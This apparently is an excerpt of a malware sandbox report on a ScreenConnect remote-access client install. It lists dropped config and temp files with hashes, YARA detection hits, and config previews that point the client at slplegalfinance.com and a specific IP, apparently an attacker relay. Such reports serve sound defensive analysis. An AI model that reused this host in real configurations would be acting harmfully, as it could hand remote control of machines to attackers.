                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.035566031827628
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLD5/vXbAa3xT:2dL9hK6E46YPaDEDRvH
                                                                                  MD5:DB0217BDD9994B8F636F6CEB7D50A573
                                                                                  SHA1:9D805F3B3AD6D68AE99C4A99756D6DF7ECEA7DF9
                                                                                  SHA-256:759159E75E4159990E608F519AA786D2BB0A33C8981FFC2C01DFE6CFB07B14C2
                                                                                  SHA-512:DC49EFE627BB41910A336CC2AA4910984F06F65FD3230418F0FB5F410ECDB12E2F4E167BCD31B13BAD1CE9143B349E8F8FB3932AC0AF65D60B83EE598F659A55
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a47%3a14</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cj0gwio1.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036871464815543
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkD6ev/vXbAa3xT:2dL9hK6E46YPaDEkX3vH
                                                                                  MD5:17AB7415565660ABFC8B16ABB1EA9B85
                                                                                  SHA1:438926C9544F0F5E2189F3F136B95BBEEB7C0976
                                                                                  SHA-256:5FBADB447DF1099A78C5C3E62DAA727E84B73A5ADF473210981D3F59E2E0E0C6
                                                                                  SHA-512:9BBFA3664C49C77C84DA51A8AA86D5DC5C1A4FFE10EAF2B13A1E84D3AFE74E0EFB8B1A20FF345CB52D136E7CDD7441B30A64EB82F13EDDF8D69D9A3619F08B97
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a45</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\isbgtems.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036871464815543
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDWI/vXbAa3xT:2dL9hK6E46YPaDEk/vH
                                                                                  MD5:DC92BC2AAE2EB22C1841137BFF29B735
                                                                                  SHA1:C3F99E0EE59070A4D9290D9798DAD08401C1C4B8
                                                                                  SHA-256:36B3D793EF6270A1A7B1D34BB30103AD9151DDCE5F727B590FFA39D4958D94A8
                                                                                  SHA-512:03A3B8D3070C228D2C7CD90E1E45FBC781B6F817D0DF07DDBABFF9ABE457B6F677978CC8750B52F87F885AE24B3A8F7B1F06447E79A590E9E5D7E298C53C9591
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a34</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ngzwv2nr.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.035566031827628
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDn/vXbAa3xT:2dL9hK6E46YPaDEkDvH
                                                                                  MD5:1AD4D215525105E2D9DE4449E31A9D6B
                                                                                  SHA1:19CC3497FCDAAE3983D2EE4892CF884BB5EE8B46
                                                                                  SHA-256:5149B9AA3DEDFA24F2A47BD2FCAF2BB377BB8D501C7BEAE221167CDC90D1831E
                                                                                  SHA-512:A2643F9B6F819F0FE506BD24D6175794D1D7A6A84176EF53B27218293CCD11A3410F373B26DE87D192F14C0BB1371F748C6D09058E2898C27298CB1B1B0CE043
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a16</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ovekkuwe.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036210074189112
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDlgQv/vXbAa3xT:2dL9hK6E46YPaDEkLvH
                                                                                  MD5:AB7C97CC9746EE1A4497BAD133FE4DDA
                                                                                  SHA1:EA792D05B0ECC420257B933F0AF235F9ED1C290E
                                                                                  SHA-256:AD74C72F58BB7D3E96C795F0BF0DFA2F24BBBC16580486F8094ADEC340DE81A2
                                                                                  SHA-512:26B7537A58B1C855AD1848926958EFEFB89DFDCE3B32D3EF62E480576F641F95D9D2C27A09FBCD7BB62AF7F1BCBE96F8DF8516408E467FA405C6FFB0F2AEE146
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a27</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rapy2x3w.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.0375155071770275
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLWa/vXbAa3xT:2dL9hK6E46YPaDEWwvH
                                                                                  MD5:8B35A1388BC25273740A530380E2CEBD
                                                                                  SHA1:2CBE5271637591A0A0D5E20013A66337C168409F
                                                                                  SHA-256:9510C9FD8D26E5DCA7138ABD224080A26392321990C817119AD7014505E3A8E8
                                                                                  SHA-512:1EF2309255D348E89CE8A9F20736558DA6D0BB762B60F2B49D0ABDFE434EDF576EED5D4E05EDE1F0F3FB6E76628D278F97BE805CD1A48687787D0B9E5AB18F53
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a47%3a36</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rn2gncqb.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036871464815543
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDF/vXbAa3xT:2dL9hK6E46YPaDEkhvH
                                                                                  MD5:CA5D8DA6D5DAEC562A123656995423A1
                                                                                  SHA1:014BB74B6C0AAC3D26097FBDB1DFC50483EE9249
                                                                                  SHA-256:2D40F81CB9F0A2C03A47E7D84ED4C3C9C1AC13F7F55F4E0DA4C5C23CA1D89E2D
                                                                                  SHA-512:C61F1F56B56E5F9D0AE7B4C22E33E735E9B45A32708558D945E1641AEB5EA47ADF8D38C21D7E8021936572CBDB62EE3F62FE9A687682A32F07F2B1EB7720E395
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a58</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\scdm2p5m.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036871464815543
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLQ5/vXbAa3xT:2dL9hK6E46YPaDEQRvH
                                                                                  MD5:CA943B276BD396FF3B3146E7165EE080
                                                                                  SHA1:FD0A0990C34CA645E6AC16D908F6532297AFFC73
                                                                                  SHA-256:52CDD6BEEFE33FE79D4F58F1917EC28E2FD5CF43A1B15C8F563D59D6725AB72F
                                                                                  SHA-512:FAB7839CBB7CF8764DA5BDEA131CBB7C8AEF3EA1AF248BB204A1D05C815E2200049D4C66C365E55FF60AD7FC2EFFFF38E3AD359837C0EB1BED6AC17F416D8A20
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a48%3a56</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\u2cov4vk.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.037076196089594
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDM/vXbAa3xT:2dL9hK6E46YPaDEkOvH
                                                                                  MD5:20E6B0C8F0AB203C0D815064580189E1
                                                                                  SHA1:832448460B22C00B6609F0DA9A2EBFE25C5F9781
                                                                                  SHA-256:0EC684F2EC4869D673D50EA6DC8D511227B858EE848E4E35554C65598DC7EB7D
                                                                                  SHA-512:24828BBABFA607F7C3E35EA3BD193C4D51FB763D064F6C4E38C5F39EE2E4C93637245BB8B7F1C17C1F4615B76306192116F8D944F38AF722980D2DA8E5398527
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a19</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\user.config (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.035566031827628
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDn/vXbAa3xT:2dL9hK6E46YPaDEkDvH
                                                                                  MD5:1AD4D215525105E2D9DE4449E31A9D6B
                                                                                  SHA1:19CC3497FCDAAE3983D2EE4892CF884BB5EE8B46
                                                                                  SHA-256:5149B9AA3DEDFA24F2A47BD2FCAF2BB377BB8D501C7BEAE221167CDC90D1831E
                                                                                  SHA-512:A2643F9B6F819F0FE506BD24D6175794D1D7A6A84176EF53B27218293CCD11A3410F373B26DE87D192F14C0BB1371F748C6D09058E2898C27298CB1B1B0CE043
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a16</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vtho1xxc.newcfg

                                                                                  Download File
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.03394114748391
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkD+/vXbAa3xT:2dL9hK6E46YPaDEkAvH
                                                                                  MD5:F0F149742C23ADDB81BC554D299DA88D
                                                                                  SHA1:1AF57E909B4CB41B12AE9CF7392E37DBE2825777
                                                                                  SHA-256:A139EF83FA26CB94F5C1B06B1B4CEFAF91A724F4825F1258578C6E50FDF88A05
                                                                                  SHA-512:8AD1AB555B212E70A1A0388F54D8B314745938609CAB540743D3B138552EC0B656614C5DD31906B91CCC5459D6CB2C49FA6C9DFB7B1EBBA789050E6FB642A169
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Windows\Temp\~DF0A7B54CF45EBCC2E.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DF0DB2C6A1117BC15C.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4215826129494757
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:J4bu0th8FXzvT5aUUP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SID2:abWRTozzuph1fdaIdAxJH11
                                                                                  MD5:AAB68382702FD067399E040774558BCF
                                                                                  SHA1:061EF788A10044307BCEDE3A078CD53F375D5705
                                                                                  SHA-256:4660A518396F9DECBAAC6D272186A2D7796B6274B39997101A56B5E7C2BF15BA
                                                                                  SHA-512:64E54374F6FF534C4B782AF031C31F96E4DECD25621384510981C2647969539F6402B842E0B265B62CD706762F927ACD9E6A2334D7993E7962F83EBDDE7EBBEF
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF0DB2C6A1117BC15C.TMP, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DF2E41F34F77A92F16.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DF2E6CBA037D9F43F7.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.07795815855168775
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOUVPQWASKChiVky6l51:2F0i8n0itFzDHFUVPV7r
                                                                                  MD5:79654B3D5A84C6D9BF1AACB08299C584
                                                                                  SHA1:17D38B9217295DCEF248D7B1C14CC74D19C8878B
                                                                                  SHA-256:3C81D4C3FC24E12DCD46EF027F965167EB1D701B30AFA0BD581CC65DB83C1D07
                                                                                  SHA-512:83B60D97FAA3D809C0297EE92EAA01D65A7F475EC1140AF881811C6FB2190FAB861BC66E145C1879771AFAF2DF9071F8F7ECF9C4AC2039B6E00571E5593D5635
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DF324137F551FF48C3.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):0.234946822766646
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:xbzDBAdum1S3qcq56Adum1Si5zaIdSAYxXV3jzoo7rqQG979e:9M1xph1fdaIdAxJ5u
                                                                                  MD5:CFC3EF4427F61A6604588E78B53C20D1
                                                                                  SHA1:47A69F55310E27976CA1016882B09EE089DF67AB
                                                                                  SHA-256:809722FDB76FC544F4476128AAAF65220B1465A673E84FD01C535EFD9AA033E9
                                                                                  SHA-512:B5D9AFDA96AEA91D4156BCFF8ED65E4155F68BD5ABC98964D73CB15E840D7054062D935576C9E9847C2C90D782A120A6EEAA69308151635D30732EFF0903A886
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF324137F551FF48C3.TMP, Author: Joe Security
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DF5F5435D7F8B729B6.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DF85B4BC076AE408FE.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.8016387648894603
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:L8PhDuRc06WXzuFT5nP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SI6:yhD1zFTXzuph1fdaIdAxJH11
                                                                                  MD5:34A8C52EFBBB37599363A63A30D0E932
                                                                                  SHA1:1ABE2E86C5352B362F58606F927FE267F82A504D
                                                                                  SHA-256:CC1556D554C2917516FB7554BEAF11742A17CF25270298DBCBFC95F180933E5B
                                                                                  SHA-512:7F446DF0540E1661C1DC892B5DAFD65779CF3FE5EAAA3BBB5F2EFC04EA1D44420174A7C819210D41747B32FE6C5BD4D1336EBF8D17EB527FC745BEDF197D84D3
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF85B4BC076AE408FE.TMP, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DF86AC890801A3F764.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4215826129494757
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:J4bu0th8FXzvT5aUUP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SID2:abWRTozzuph1fdaIdAxJH11
                                                                                  MD5:AAB68382702FD067399E040774558BCF
                                                                                  SHA1:061EF788A10044307BCEDE3A078CD53F375D5705
                                                                                  SHA-256:4660A518396F9DECBAAC6D272186A2D7796B6274B39997101A56B5E7C2BF15BA
                                                                                  SHA-512:64E54374F6FF534C4B782AF031C31F96E4DECD25621384510981C2647969539F6402B842E0B265B62CD706762F927ACD9E6A2334D7993E7962F83EBDDE7EBBEF
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF86AC890801A3F764.TMP, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DF97765AD7BBEEEF8A.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4215826129494757
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:J4bu0th8FXzvT5aUUP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SID2:abWRTozzuph1fdaIdAxJH11
                                                                                  MD5:AAB68382702FD067399E040774558BCF
                                                                                  SHA1:061EF788A10044307BCEDE3A078CD53F375D5705
                                                                                  SHA-256:4660A518396F9DECBAAC6D272186A2D7796B6274B39997101A56B5E7C2BF15BA
                                                                                  SHA-512:64E54374F6FF534C4B782AF031C31F96E4DECD25621384510981C2647969539F6402B842E0B265B62CD706762F927ACD9E6A2334D7993E7962F83EBDDE7EBBEF
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF97765AD7BBEEEF8A.TMP, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DFA109DF749DD5BF4A.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Temp\~DFC2C1B5F26C92D1A2.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.8016387648894603
                                                                                  Encrypted:false
